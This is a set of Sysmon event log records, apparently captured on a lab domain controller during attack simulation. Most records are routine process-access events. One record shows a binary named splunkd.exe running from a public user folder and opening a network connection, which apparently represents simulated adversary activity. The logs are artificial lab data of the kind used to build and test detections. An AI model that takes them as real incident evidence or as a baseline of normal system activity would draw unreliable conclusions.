{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1989,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1990,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1991,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1992,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1993,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1994,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1995,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.443\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106E-5F25-0000-0010C6E40300}\r\nTargetProcessId: 3976\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.443","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106E-5F25-0000-0010C6E40300}","TargetProcessId":"3976","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":1996,"ProcessID":2928,"ThreadID":3388,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: Usermode\r\nUtcTime: 2020-08-01 06:49:16.509\r\nProcessGuid: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nProcessId: 2308\r\nImage: C:\\Users\\Public\\splunkd.exe\r\nUser: NT AUTHORITY\\SYSTEM\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-8400769.attackrange.local\r\nSourcePort: 49689\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 10.0.1.12\r\nDestinationHostname: \r\nDestinationPort: 7010\r\nDestinationPortName: ","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","RuleName":"Usermode","UtcTime":"2020-08-01 06:49:16.509","ProcessGuid":"{E2A3D6B1-1061-5F25-0000-001069980200}","Image":"C:\\Users\\Public\\splunkd.exe","User":"NT AUTHORITY\\SYSTEM","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-8400769.attackrange.local","SourcePort":"49689","DestinationIsIpv6":"false","DestinationIp":"10.0.1.12","DestinationPort":"7010","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1997,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.661\r\nSourceProcessGUID: {E2A3D6B1-106E-5F25-0000-0010C6E40300}\r\nSourceProcessId: 3976\r\nSourceThreadId: 3996\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.661","SourceProcessGUID":"{E2A3D6B1-106E-5F25-0000-0010C6E40300}","SourceProcessId":"3976","SourceThreadId":"3996","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
